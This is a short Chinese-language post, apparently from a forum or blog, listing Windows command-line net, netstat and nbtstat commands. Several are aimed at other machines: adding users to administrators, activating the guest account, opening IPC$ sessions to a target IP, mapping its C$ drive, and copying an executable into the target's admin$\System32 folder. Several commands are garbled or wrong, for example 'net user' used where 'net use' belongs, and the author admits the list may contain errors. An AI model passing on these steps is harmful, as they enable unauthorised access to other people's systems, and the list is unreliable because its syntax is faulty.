net user 用户名 密码 /add (建立用户) net localgroup administrators 用户名 密码 /add (将用户加到管理员,使其拥有管理权限) net user guest /active:Yes (激活guest用户) net user guest /12345 (用guest登陆后改密码为12345) net user (查看账号属性) net user \\ip\ipc$ "" /user (建立空IPC链接) net user \\ip\ipc$ "密码" /user:"用户名" (建立IPC非空链接,非空链接就是需要帐户和密码) net user H:\\ip\c$ "密码"/user:"用户名" (直接登陆后映射对方C:到本地为H:) net user \\ip\ipc$/del (删除IPC空链接) net start (查看开启了哪些服务) net user H:/del (删除映射对方到本地为H的映射) net start 服务器 (开启服务) net time \\目标IP (查看对方时间) net view (查看本地局域网开启了哪些共享) net logoff (断开共享连接) net share (查看本地开启的哪些共享) net share IPC$ (开启IPC$共享) net share IPC$/del (删除IPC$共享) net share C$/del (删除C:共享) netstat -a (查看计算机开放了哪些端口) netstat -n (查看端口的网络连接情况) nbtstat -A ip (对方136到139一个端口开放了就可以查出对方用户名) tracert -参数 ip (跟踪路由) Copy xx.exe\\ip\admin$\System32 (将当前xx.exe复制到对方Admin$共享的System32目录内) 本人记住的只有这些了,不全的有错误的地方还请多多提出。

最新评论 共有0位网友发表了评论
发表评论